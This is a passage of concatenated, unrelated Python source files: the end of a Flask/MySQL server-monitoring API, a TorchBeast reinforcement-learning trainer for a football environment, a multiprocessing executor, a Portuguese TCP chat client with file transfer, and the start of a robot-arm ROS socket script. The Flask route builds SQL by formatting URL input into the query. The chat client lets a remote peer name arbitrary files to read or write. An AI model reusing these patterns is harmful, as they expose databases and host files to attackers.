return jsonify(json_data)
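# Illustrative only (not part of the original project): a hedged sketch of how a
# client could call the /now/<hostname>/<port> route above; hosts and ports here
# are placeholder assumptions.
def _example_query_now(cm_host='127.0.0.1', cm_port=5000, agent_host='127.0.0.1', agent_port=8888):
    # ask the central manager for the live status of one agent and decode the JSON reply
    with urlopen('http://{}:{}/now/{}/{}'.format(cm_host, cm_port, agent_host, agent_port)) as url:
        return json.loads(url.read().decode())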
# start Flask service: retrieve list of servers
@app.route('/servers')
def web_servers():
servers = list()
# access database to retrieve servers
try:
# retrieve data
        cur.execute('SELECT * FROM {}_server'.format(db_prefix))
        for row in cur.fetchall():
            servers.append(Server(row[0], row[1], row[2], row[3], row[4], row[5]))
names, types, modes, hosts, ports = [], [], [], [], []
for server in servers:
names.append(server.get_name())
types.append(server.get_type())
modes.append(server.get_mode())
hosts.append(server.get_host())
ports.append(server.get_ports())
# create json data
json_data = [
{
'name': name,
'type': typ,
'mode': mode,
'host': host,
'port': port
}
for name, typ, mode, host, port in zip(names, types, modes, hosts, ports)
]
logging.info('Retrieved all servers data for IP: {}'.format(request.remote_addr), extra={'topic': 'CM'})
# print json data
return jsonify(json_data)
except pymysql.Error as ex:
logging.error('Error when trying to retrieve data from the database! STACKTRACE: {}'.format(ex.args[1]),
extra={'topic': 'SQL'})
logging.error('Force closing program...', extra={'topic': 'SQL'})
exit()
# start Flask service: retrieve latest errors
@app.route('/errors/<count>')
def web_errors(count):
errors = list()
# access database to retrieve errors
try:
# retrieve data
        cur.execute('SELECT * FROM {}_log ORDER BY id DESC LIMIT {}'.format(db_prefix, count))
        for row in cur.fetchall():
            errors.append(ErrorLog(row[1], row[2], row[3], row[4]))
servernames, timestamps, types, msgs = [], [], [], []
for error in errors:
servernames.append(error.get_servername())
timestamps.append(error.get_timestamp())
types.append(error.get_type())
msgs.append(error.get_msg())
# create json data
json_data = [
{
'server_name': server_name,
'timestamp': timestamp,
'type': typ,
'msg': msg
}
for server_name, timestamp, typ, msg in zip(servernames, timestamps, types, msgs)
]
        logging.info('Retrieved the latest {} error entries for IP: {}'.format(count, request.remote_addr), extra={'topic': 'CM'})
# print json data
return jsonify(json_data)
except pymysql.Error as ex:
logging.error('Error when trying to retrieve data from the database! STACKTRACE: {}'.format(ex.args[1]),
extra={'topic': 'SQL'})
logging.error('Force closing program...', extra={'topic': 'SQL'})
exit()
# main "method"
if __name__ == '__main__':
# check to make sure the database has the required tables
logging.info('Starting program...', extra={'topic': 'CM'})
try:
# initiate connection
con, cur = db_management.connect_to_db(logging, db_host, db_port, db_user, db_pass, db_name)
        # check that the required tables exist in the database (create them if missing)
db_management.check_tables(logging, con, cur)
except pymysql.Error as e:
logging.error('Error when trying to connect to the database OR check/create table! STACKTRACE: {}'
.format(e.args[1]), extra={'topic': 'SQL'})
logging.error('Force closing program...', extra={'topic': 'SQL'})
exit()
# start scraping thread job!
logging.info('Starting scraping thread...', extra={'topic': 'CM'})
thd = Thread(target=scrape_data, args=(interval_time, ))
thd.daemon = True
thd.start()
logging.info('Scrape thread started!', extra={'topic': 'CM'})
# start Flask service
logging.info('Starting Flask service...', extra={'topic': 'CM'})
app.run(host=flsk_host, port=flsk_port)
|
monobeast_football.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import logging
import os
import pprint
import threading
import time
import timeit
import traceback
import typing
os.environ["OMP_NUM_THREADS"] = "1" # Necessary for multithreading.
import torch
from torch import multiprocessing as mp
from torch import nn
from torch.nn import functional as F
from torchbeast import football_wrappers
from torchbeast.core import environment
from torchbeast.core import file_writer
from torchbeast.core import prof
from torchbeast.core import vtrace
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--env", type=str, default="11_vs_11_kaggle",
help="GFootball environment.")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument("--xpid", default=None,
help="Experiment id (default: None).")
# Training settings.
parser.add_argument("--disable_checkpoint", action="store_true",
help="Disable saving checkpoint.")
parser.add_argument("--savedir", default="~/logs/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors (default: 4).")
parser.add_argument("--total_steps", default=100000, type=int, metavar="T",
help="Total environment steps to train for.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size.")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension).")
parser.add_argument("--num_buffers", default=None, type=int,
metavar="N", help="Number of shared-memory buffers.")
parser.add_argument("--num_learner_threads", "--num_threads", default=2, type=int,
                    metavar="N", help="Number of learner threads.")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
parser.add_argument('--load_checkpoint_weights', default=None,
help="Load model weights from a checkpoint")
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006,
type=float, help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5,
type=float, help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99,
type=float, help="Discounting factor.")
parser.add_argument("--reward_clipping", default="abs_one",
choices=["abs_one", "none"],
help="Reward clipping.")
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048,
type=float, metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# yapf: enable
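# Hedged example invocation (module path and flag values are assumptions, adjust to your setup):
#   python -m torchbeast.monobeast_football --env 11_vs_11_kaggle \
#       --num_actors 4 --total_steps 100000 --batch_size 8 --unroll_length 80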
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] " "%(message)s"
),
level=0,
)
Buffers = typing.Dict[str, typing.List[torch.Tensor]]
def compute_baseline_loss(advantages):
return 0.5 * torch.sum(advantages ** 2)
def compute_entropy_loss(logits):
"""Return the entropy loss, i.e., the negative entropy of the policy."""
policy = F.softmax(logits, dim=-1)
log_policy = F.log_softmax(logits, dim=-1)
return torch.sum(policy * log_policy)
def compute_policy_gradient_loss(logits, actions, advantages):
cross_entropy = F.nll_loss(
F.log_softmax(torch.flatten(logits, 0, 1), dim=-1),
target=torch.flatten(actions, 0, 1),
reduction="none",
)
cross_entropy = cross_entropy.view_as(advantages)
return torch.sum(cross_entropy * advantages.detach())
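# Hedged sanity-check sketch (not part of the original TorchBeast code): the three
# loss helpers above operate on [T, B, ...] tensors; the shapes below are assumptions.
def _example_loss_shapes(T=5, B=3, num_actions=19):
    logits = torch.randn(T, B, num_actions)       # policy logits per step
    actions = torch.randint(num_actions, (T, B))  # sampled actions per step
    advantages = torch.randn(T, B)                # e.g. V-trace pg_advantages
    return (
        compute_policy_gradient_loss(logits, actions, advantages).item(),
        compute_entropy_loss(logits).item(),
        compute_baseline_loss(advantages).item(),
    )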
def act(
flags,
actor_index: int,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
model: torch.nn.Module,
buffers: Buffers,
initial_agent_state_buffers,
):
try:
logging.info("Actor %i started.", actor_index)
timings = prof.Timings() # Keep track of how fast things are.
gym_env = create_env(flags)
seed = actor_index ^ int.from_bytes(os.urandom(4), byteorder="little")
gym_env.seed(seed)
env = environment.Environment(gym_env)
env_output = env.initial()
agent_state = model.initial_state(batch_size=1)
agent_output, unused_state = model(env_output, agent_state)
while True:
index = free_queue.get()
if index is None:
break
# Write old rollout end.
for key in env_output:
buffers[key][index][0, ...] = env_output[key]
for key in agent_output:
buffers[key][index][0, ...] = agent_output[key]
for i, tensor in enumerate(agent_state):
initial_agent_state_buffers[index][i][...] = tensor
# Do new rollout.
for t in range(flags.unroll_length):
timings.reset()
with torch.no_grad():
agent_output, agent_state = model(env_output, agent_state)
timings.time("model")
env_output = env.step(agent_output["action"])
timings.time("step")
for key in env_output:
buffers[key][index][t + 1, ...] = env_output[key]
for key in agent_output:
buffers[key][index][t + 1, ...] = agent_output[key]
timings.time("write")
full_queue.put(index)
if actor_index == 0:
logging.info("Actor %i: %s", actor_index, timings.summary())
except KeyboardInterrupt:
pass # Return silently.
except Exception as e:
logging.error("Exception in worker process %i", actor_index)
traceback.print_exc()
print()
raise e
def get_batch(
flags,
free_queue: mp.SimpleQueue,
full_queue: mp.SimpleQueue,
buffers: Buffers,
initial_agent_state_buffers,
timings,
lock=threading.Lock(),
):
with lock:
timings.time("lock")
indices = [full_queue.get() for _ in range(flags.batch_size)]
timings.time("dequeue")
batch = {
key: torch.stack([buffers[key][m] for m in indices], dim=1) for key in buffers
}
initial_agent_state = (
torch.cat(ts, dim=1)
for ts in zip(*[initial_agent_state_buffers[m] for m in indices])
)
timings.time("batch")
for m in indices:
free_queue.put(m)
timings.time("enqueue")
batch = {k: t.to(device=flags.device, non_blocking=True) for k, t in batch.items()}
initial_agent_state = tuple(
t.to(device=flags.device, non_blocking=True) for t in initial_agent_state
)
timings.time("device")
return batch, initial_agent_state
def learn(
flags,
actor_model,
model,
batch,
initial_agent_state,
optimizer,
scheduler,
lock=threading.Lock(), # noqa: B008
):
"""Performs a learning (optimization) step."""
with lock:
learner_outputs, unused_state = model(batch, initial_agent_state)
# Take final value function slice for bootstrapping.
bootstrap_value = learner_outputs["baseline"][-1]
# Move from obs[t] -> action[t] to action[t] -> obs[t].
batch = {key: tensor[1:] for key, tensor in batch.items()}
learner_outputs = {key: tensor[:-1] for key, tensor in learner_outputs.items()}
rewards = batch["reward"]
if flags.reward_clipping == "abs_one":
clipped_rewards = torch.clamp(rewards, -1, 1)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
discounts = (~batch["done"]).float() * flags.discounting
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=batch["policy_logits"],
target_policy_logits=learner_outputs["policy_logits"],
actions=batch["action"],
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs["baseline"],
bootstrap_value=bootstrap_value,
)
pg_loss = compute_policy_gradient_loss(
learner_outputs["policy_logits"],
batch["action"],
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * compute_baseline_loss(
vtrace_returns.vs - learner_outputs["baseline"]
)
entropy_loss = flags.entropy_cost * compute_entropy_loss(
learner_outputs["policy_logits"]
)
total_loss = pg_loss + baseline_loss + entropy_loss
episode_returns = batch["episode_return"][batch["done"]]
stats = {
"episode_returns": tuple(episode_returns.cpu().numpy()),
"mean_episode_return": torch.mean(episode_returns).item(),
"total_loss": total_loss.item(),
"pg_loss": pg_loss.item(),
"baseline_loss": baseline_loss.item(),
"entropy_loss": entropy_loss.item(),
}
optimizer.zero_grad()
total_loss.backward()
nn.utils.clip_grad_norm_(model.parameters(), flags.grad_norm_clipping)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(model.state_dict())
return stats
def create_buffers(flags, obs_shape, num_actions) -> Buffers:
T = flags.unroll_length
specs = dict(
frame=dict(size=(T + 1, *obs_shape), dtype=torch.uint8),
reward=dict(size=(T + 1,), dtype=torch.float32),
done=dict(size=(T + 1,), dtype=torch.bool),
episode_return=dict(size=(T + 1,), dtype=torch.float32),
episode_step=dict(size=(T + 1,), dtype=torch.int32),
policy_logits=dict(size=(T + 1, num_actions), dtype=torch.float32),
baseline=dict(size=(T + 1,), dtype=torch.float32),
last_action=dict(size=(T + 1,), dtype=torch.int64),
action=dict(size=(T + 1,), dtype=torch.int64),
)
buffers: Buffers = {key: [] for key in specs}
for _ in range(flags.num_buffers):
for key in buffers:
buffers[key].append(torch.empty(**specs[key]).share_memory_())
return buffers
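# Hedged illustration (observation shape and flag values are assumptions, not the
# original training config): inspect the per-rollout tensor shapes that
# create_buffers() allocates in shared memory.
def _example_buffer_shapes(obs_shape=(4, 84, 84), num_actions=19):
    flags = argparse.Namespace(unroll_length=80, num_buffers=2)
    buffers = create_buffers(flags, obs_shape, num_actions)
    return {key: tuple(tensors[0].shape) for key, tensors in buffers.items()}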
def train(flags): # pylint: disable=too-many-branches, too-many-statements
if flags.xpid is None:
flags.xpid = "torchbeast-%s" % time.strftime("%Y%m%d-%H%M%S")
plogger = file_writer.FileWriter(
xpid=flags.xpid, xp_args=flags.__dict__, rootdir=flags.savedir
)
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
if flags.num_buffers is None: # Set sensible default for num_buffers.
flags.num_buffers = max(2 * flags.num_actors, flags.batch_size)
if flags.num_actors >= flags.num_buffers:
raise ValueError("num_buffers should be larger than num_actors")
if flags.num_buffers < flags.batch_size:
raise ValueError("num_buffers should be larger than batch_size")
T = flags.unroll_length
B = flags.batch_size
flags.device = None
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
flags.device = torch.device("cuda")
else:
logging.info("Not using CUDA.")
flags.device = torch.device("cpu")
env = create_env(flags)
model = Net(env.observation_space.shape, env.action_space.n, flags.use_lstm)
buffers = create_buffers(flags, env.observation_space.shape, model.num_actions)
if flags.load_checkpoint_weights is not None:
logging.info(f"Loading model weights from {flags.load_checkpoint_weights}")
initial_checkpoint = torch.load(os.path.join(flags.load_checkpoint_weights, 'model.tar'), map_location="cpu")
model.load_state_dict(initial_checkpoint["model_state_dict"])
model.share_memory()
# Add initial RNN state.
initial_agent_state_buffers = []
for _ in range(flags.num_buffers):
state = model.initial_state(batch_size=1)
for t in state:
t.share_memory_()
initial_agent_state_buffers.append(state)
actor_processes = []
ctx = mp.get_context("fork")
free_queue = ctx.SimpleQueue()
full_queue = ctx.SimpleQueue()
for i in range(flags.num_actors):
actor = ctx.Process(
target=act,
args=(
flags,
i,
free_queue,
full_queue,
model,
buffers,
initial_agent_state_buffers,
),
)
actor.start()
actor_processes.append(actor)
learner_model = Net(
env.observation_space.shape, env.action_space.n, flags.use_lstm
).to(device=flags.device)
if flags.load_checkpoint_weights is not None:
learner_model.load_state_dict(model.state_dict())
optimizer = torch.optim.RMSprop(
learner_model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return 1 - min(epoch * T * B, flags.total_steps) / flags.total_steps
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
logger = logging.getLogger("logfile")
stat_keys = [
"total_loss",
"mean_episode_return",
"pg_loss",
"baseline_loss",
"entropy_loss",
]
logger.info("# Step\t%s", "\t".join(stat_keys))
step, stats = 0, {}
def batch_and_learn(i, lock=threading.Lock()):
"""Thread target for the learning process."""
nonlocal step, stats
timings = prof.Timings()
while step < flags.total_steps:
timings.reset()
batch, agent_state = get_batch(
flags,
free_queue,
full_queue,
buffers,
initial_agent_state_buffers,
timings,
)
stats = learn(
flags, model, learner_model, batch, agent_state, optimizer, scheduler
)
timings.time("learn")
with lock:
to_log = dict(step=step)
to_log.update({k: stats[k] for k in stat_keys})
plogger.log(to_log)
step += T * B
if i == 0:
logging.info("Batch and learn: %s", timings.summary())
for m in range(flags.num_buffers):
free_queue.put(m)
threads = []
for i in range(flags.num_learner_threads):
thread = threading.Thread(
target=batch_and_learn, name="batch-and-learn-%d" % i, args=(i,)
)
thread.start()
threads.append(thread)
def checkpoint():
if flags.disable_checkpoint:
return
logging.info("Saving checkpoint to %s", checkpointpath)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"flags": vars(flags),
},
checkpointpath,
)
timer = timeit.default_timer
try:
last_checkpoint_time = timer()
while step < flags.total_steps:
start_step = step
start_time = timer()
time.sleep(5)
if timer() - last_checkpoint_time > 10 * 60: # Save every 10 min.
checkpoint()
last_checkpoint_time = timer()
sps = (step - start_step) / (timer() - start_time)
if stats.get("episode_returns", None):
mean_return = (
"Return per episode: %.1f. " % stats["mean_episode_return"]
)
else:
mean_return = ""
total_loss = stats.get("total_loss", float("inf"))
logging.info(
"Steps %i @ %.1f SPS. Loss %f. %sStats:\n%s",
step,
sps,
total_loss,
mean_return,
pprint.pformat(stats),
)
except KeyboardInterrupt:
return # Try joining actors then quit.
else:
for thread in threads:
thread.join()
logging.info("Learning finished after %d steps.", step)
finally:
for _ in range(flags.num_actors):
free_queue.put(None)
for actor in actor_processes:
actor.join(timeout=1)
checkpoint()
plogger.close()
def test(flags, num_episodes: int = 10):
if flags.xpid is None:
checkpointpath = "./latest/model.tar"
else:
checkpointpath = os.path.expandvars(
os.path.expanduser("%s/%s/%s" % (flags.savedir, flags.xpid, "model.tar"))
)
gym_env = create_env(flags)
env = environment.Environment(gym_env)
model = Net(gym_env.observation_space.shape, gym_env.action_space.n, flags.use_lstm)
model.eval()
checkpoint = torch.load(checkpointpath, map_location="cpu")
model.load_state_dict(checkpoint["model_state_dict"])
observation = env.initial()
returns = []
while len(returns) < num_episodes:
if flags.mode == "test_render":
env.gym_env.render()
agent_outputs = model(observation)
policy_outputs, _ = agent_outputs
observation = env.step(policy_outputs["action"])
if observation["done"].item():
returns.append(observation["episode_return"].item())
logging.info(
"Episode ended after %d steps. Return: %.1f",
observation["episode_step"].item(),
observation["episode_return"].item(),
)
env.close()
    logging.info(
        "Average returns over %i episodes: %.1f", num_episodes, sum(returns) / len(returns)
)
class AtariNet(nn.Module):
def __init__(self, observation_shape, num_actions, use_lstm=False):
super(AtariNet, self).__init__()
self.observation_shape = observation_shape
self.num_actions = num_actions
# Feature extraction.
self.conv1 = nn.Conv2d(
in_channels=self.observation_shape[0],
out_channels=32,
kernel_size=8,
stride=4,
)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
# Fully connected layer.
self.fc = nn.Linear(3136, 512)
# FC output size + one-hot of last action + last reward.
core_output_size = self.fc.out_features + num_actions + 1
self.use_lstm = use_lstm
if use_lstm:
self.core = nn.LSTM(core_output_size, core_output_size, 2)
self.policy = nn.Linear(core_output_size, self.num_actions)
self.baseline = nn.Linear(core_output_size, 1)
def initial_state(self, batch_size):
if not self.use_lstm:
return tuple()
return tuple(
torch.zeros(self.core.num_layers, batch_size, self.core.hidden_size)
for _ in range(2)
)
def forward(self, inputs, core_state=()):
x = inputs["frame"] # [T, B, C, H, W].
T, B, *_ = x.shape
x = torch.flatten(x, 0, 1) # Merge time and batch.
x = x.float() / 255.0
x = F.relu(self.conv1(x))
x = F.relu(self.conv2(x))
x = F.relu(self.conv3(x))
x = x.view(T * B, -1)
x = F.relu(self.fc(x))
one_hot_last_action = F.one_hot(
inputs["last_action"].view(T * B), self.num_actions
).float()
clipped_reward = torch.clamp(inputs["reward"], -1, 1).view(T * B, 1)
core_input = torch.cat([x, clipped_reward, one_hot_last_action], dim=-1)
if self.use_lstm:
core_input = core_input.view(T, B, -1)
core_output_list = []
notdone = (~inputs["done"]).float()
for input, nd in zip(core_input.unbind(), notdone.unbind()):
# Reset core state to zero whenever an episode ended.
# Make `done` broadcastable with (num_layers, B, hidden_size)
# states:
nd = nd.view(1, -1, 1)
core_state = tuple(nd * s for s in core_state)
output, core_state = self.core(input.unsqueeze(0), core_state)
core_output_list.append(output)
core_output = torch.flatten(torch.cat(core_output_list), 0, 1)
else:
core_output = core_input
core_state = tuple()
policy_logits = self.policy(core_output)
baseline = self.baseline(core_output)
if self.training:
action = torch.multinomial(F.softmax(policy_logits, dim=1), num_samples=1)
else:
# Don't sample when testing.
action = torch.argmax(policy_logits, dim=1)
policy_logits = policy_logits.view(T, B, self.num_actions)
baseline = baseline.view(T, B)
action = action.view(T, B)
return (
dict(policy_logits=policy_logits, baseline=baseline, action=action),
core_state,
)
Net = AtariNet
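# Hedged forward-pass sketch (not part of the original file): assumes 4 stacked
# 84x84 frames so that the flattened conv output matches the 3136-unit fc layer above.
def _example_forward(T=2, B=1, num_actions=19):
    net = Net((4, 84, 84), num_actions, use_lstm=False)
    dummy_inputs = dict(
        frame=torch.zeros(T, B, 4, 84, 84, dtype=torch.uint8),
        last_action=torch.zeros(T, B, dtype=torch.int64),
        reward=torch.zeros(T, B),
        done=torch.zeros(T, B, dtype=torch.bool),
    )
    outputs, _ = net(dummy_inputs)
    # policy_logits: [T, B, num_actions], baseline: [T, B], action: [T, B]
    return {key: tuple(value.shape) for key, value in outputs.items()}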
def create_env(flags):
return football_wrappers.wrap_pytorch(
football_wrappers.wrap_football(
football_wrappers.make_football(flags.env),
clip_rewards=False,
frame_stack=True,
scale=False,
)
)
def main(flags):
if flags.mode == "train":
train(flags)
else:
test(flags)
if __name__ == "__main__":
flags = parser.parse_args()
main(flags)
|
async_executor.py
|
from multiprocessing import Process
from multiprocessing import Manager
import multiprocessing
import numpy as np
from progressbar.bar import ProgressBar
class AsyncExecutor:
def __init__(self, n_jobs=1):
self.num_workers = n_jobs if n_jobs > 0 else multiprocessing.cpu_count()
self._pool = []
self._populate_pool()
def run(self, target, *args_iter, verbose=False):
workers_idle = [False] * self.num_workers
tasks = list(zip(*args_iter))
n_tasks = len(tasks)
if verbose:
pbar = ProgressBar(max_value=n_tasks)
while not all(workers_idle):
for i in range(self.num_workers):
if not self._pool[i].is_alive():
self._pool[i].terminate()
if len(tasks) > 0:
if verbose:
pbar.update(n_tasks-len(tasks))
#print(n_tasks-len(tasks))
next_task = tasks.pop(0)
self._pool[i] = _start_process(target, next_task)
else:
workers_idle[i] = True
if verbose:
pbar.finish()
def _populate_pool(self):
self._pool = [_start_process(_dummy_fun) for _ in range(self.num_workers)]
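# Hedged usage sketch (not part of the original module): the target function and
# its argument iterables below are made-up examples.
def _square_and_print(x, tag):
    print(tag, x * x)

def _example_async_executor():
    xs = list(range(8))
    tags = ['task-%d' % i for i in xs]
    # each task receives one element from every iterable; at most 2 workers run at once
    AsyncExecutor(n_jobs=2).run(_square_and_print, xs, tags)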
class LoopExecutor:
def run(self, target, *args_iter, verbose=False):
tasks = list(zip(*args_iter))
n_tasks = len(tasks)
if verbose:
pbar = ProgressBar(max_value=n_tasks)
for i, task in enumerate(tasks):
target(*task)
if verbose:
pbar.update(i+1)
def execute_batch_async_pdf(pdf_fun, X, Y, n_jobs=-1, batch_size=None):
"""
Executes pdf_fun in batches in multiple processes and concatenates results along axis 0
Args:
pdf_fun: callable with signature pdf(X, Y) returning a numpy array
X: ndarray with shape (n_queries, ndim_x)
Y: ndarray with shape (n_queries, ndim_y)
      n_jobs: integer denoting the number of jobs to launch in parallel. If smaller than 1,
              the larger of the CPU count and 8 is used
batch_size: (optional) integer denoting the batch size for the individual function calls
Returns:
ndarray of shape (n_queries,) which results from a concatenation of all pdf calls
"""
# split query arrays into batches
query_length = X.shape[0]
if n_jobs < 1:
n_jobs = max(multiprocessing.cpu_count(), 8)
if batch_size is None:
n_batches = n_jobs
else:
n_batches = query_length // batch_size + int(not (query_length % batch_size == 0))
X_batches, Y_batches, indices = _split_into_batches(X, Y, n_batches)
# prepare multiprocessing setup
manager = Manager()
result_dict = manager.dict()
def run_pdf_async(X_batch, Y_batch, batch_idx):
p = pdf_fun(X_batch, Y_batch)
result_dict[batch_idx] = p
# compute pdf for batches asynchronously
executer = AsyncExecutor(n_jobs=n_jobs)
executer.run(run_pdf_async, X_batches, Y_batches, indices)
# concatenate results
p_final = np.concatenate([result_dict[i] for i in indices], axis=0)
assert p_final.shape[0] == query_length
return p_final
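# Hedged usage sketch for execute_batch_async_pdf (the toy density below is an
# illustration, not a function from this package).
def _toy_pdf(X, Y):
    return np.exp(-0.5 * np.sum((Y - X) ** 2, axis=-1))

def _example_batch_async_pdf():
    X = np.random.randn(1000, 2)
    Y = np.random.randn(1000, 2)
    p = execute_batch_async_pdf(_toy_pdf, X, Y, n_jobs=2, batch_size=250)
    assert p.shape == (1000,)
    return p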
def _split_into_batches(X, Y, n_batches):
    assert X.shape[0] == Y.shape[0]
if n_batches <= 1:
return [X], [Y], range(1)
else:
return np.array_split(X, n_batches, axis=0), np.array_split(Y, n_batches, axis=0), range(n_batches)
""" helpers """
def _start_process(target, args=None):
if args:
p = Process(target=target, args=args)
else:
p = Process(target=target)
p.start()
return p
def _dummy_fun():
pass
|
cliente_tcp.py
|
#!/usr/bin/python3
from socket import *
import threading
from threading import Thread
from time import sleep
import sys, ssl
lock = threading.Lock()
RECV_BUFFER = 2024
global writer
chatting = False
def envia(mensagem, sock):
lock.acquire()
sock.send( mensagem.encode('utf-8') )
lock.release()
class Heartbeat(object):
def __init__(self, sock, time):
self.on = True
self.beating = False
self.delay = time
self.sock = sock
def beat(self):
while self.on:
if( self.beating ):
envia("HB", self.sock)
sleep(self.delay)
class ListenerSocket(object):
def __init__(self):
self.on = True
def listen(self):
global chatting
global writer
while self.on:
chatfd, chataddr = listener.accept()
print (chataddr)
while 1:
data = chatfd.recv(RECV_BUFFER).decode('utf-8')
if (len(data) == 0):
continue
if (data.split()[0] == "CONN"):
chatting = True
buddyip = data.split()[1]
buddyport = (int)(data.split()[2])
buddy = data.split()[3]
writer = TCPWriter(buddyip,buddyport)
writer.connect()
print("You are connected to %s."% buddy)
print(chatting)
elif (data.split()[0] == "FILE"):
file_path = data.split()[1]
writer.send("SENDING %s" % file_path)
print("Enviando arquivo --%s--"% file_path)
writer.send_file( file_path )
sleep(0.1)
writer.send("SENT %s" % file_path)
continue
elif (data.split()[0] == "SENDING"):
print ("Comecou a receber arquivo.")
arq = open(data.split()[1], 'wb')
while 1:
data = chatfd.recv(RECV_BUFFER)
print("data eh --%s--" % data)
lista_split = data.split()
if( len(lista_split)>0 and lista_split[0] == b"SENT"):
break
if( not data or len(lista_split)==0 or lista_split[0] == "SENT"):
break
arq.write(data)
arq.close()
print ("Recebeu arquivo inteiro.")
continue
elif (data.split()[0] == "DISCONNECT"):
writer.disconnect()
break
else:
print (data)
class TCPWriter(object):
def __init__(self,buddy_ip,buddy_port):
self.ip = buddy_ip
self.port = buddy_port
self.socket = socket(AF_INET, SOCK_STREAM)
def connect(self):
global chatting
self.socket.connect((self.ip, self.port))
chatting = True
def disconnect(self):
global chatting
print("Seu chat foi encerrado.")
self.socket.close()
chatting = False
def send(self,message):
envia(message, self.socket)
def send_file(self, file_path):
arq = open(file_path, 'rb')
for line in arq.readlines():
lock.acquire()
self.socket.send( line )
lock.release()
arq.close()
print("Terminou de enviar o arquivo.")
if len(sys.argv) != 4:
    print("Usage: ./cliente.py ip port chat_port")
sys.exit(0)
serverName = sys.argv[1]
serverPort = int(sys.argv[2])
chatPort = int(sys.argv[3])
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket = ssl.wrap_socket(clientSocket,
ca_certs="server.crt",
cert_reqs=ssl.CERT_REQUIRED)
clientSocket.connect((serverName,serverPort))
listener = socket(AF_INET, SOCK_STREAM)
listener.bind(('', chatPort))
listener.listen(5)
sender = socket(AF_INET, SOCK_STREAM)
# Start heartbeat
hb = Heartbeat(clientSocket, 1)
t = threading.Thread(target = hb.beat)
t.start()
# Start listener
lskt = ListenerSocket()
t2 = threading.Thread(target = lskt.listen)
t2.start()
usuario = "anonymous"
try:
while 1:
comando = input('Escreva a mensagem: ')
if (chatting):
if(comando.split()[0] == "FILE"):
writer.send(comando)
elif(comando.split()[0] == "DISCONNECT"):
writer.send(comando)
writer.disconnect()
else:
writer.send(comando)
else:
mensagem = ""
if( comando=="login" ):
usuario = input('Escreva seu nickname: ')
mensagem = "LOGIN " + usuario + " " + str(chatPort)
envia(mensagem, clientSocket)
data = clientSocket.recv(2048).decode('utf-8')
if (data.split()[0] == "OK"):
print("Login feito com sucesso")
else:
print("Login falhou")
usuario = "anonymous"
continue
hb.beating = True
elif( comando=="list" ):
mensagem = "LIST"
envia(mensagem, clientSocket)
data = clientSocket.recv(2048).decode('utf-8')
words = data.split('\n')
print("Lista de usuários:")
for word in words:
print (word)
elif( comando=="logout" ):
mensagem = "LOGOUT " + usuario
envia(mensagem, clientSocket)
hb.beating = False
elif( comando=="quit" or comando=="exit"):
hb.on = False
envia("CLOSE", clientSocket)
break
elif( comando == "chat"):
buddy = input('Escreva o nick do usuario com quem deseja conversar: ')
envia("CHAT " + usuario + " " + buddy, clientSocket)
data = clientSocket.recv(2048).decode('utf-8')
print (data)
if data.split()[0] == "NOK":
print("Failed: Cannot start chat")
continue
else:
print("You started a connection with %s" %buddy)
buddyip = data.split()[1]
buddyport = (int)(data.split()[2])
print (buddyip)
print (buddyport)
chatting = True
writer = TCPWriter(buddyip,buddyport)
writer.connect()
                    myip = clientSocket.getsockname()[0]
writer.send("CONN "+ myip + " " + str(chatPort) + " " + usuario)
except (KeyboardInterrupt, SystemExit):
print ('\nReceived keyboard interrupt, quitting program.')
hb.on = False
clientSocket.close()
hb.on = False
clientSocket.close()
|
Hiwin_RT605_ArmCommand_Socket_20190627184253.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
Socket = 0
data = '0' # initial value of the transmitted data
Arm_feedback = 1 # assume the arm is busy
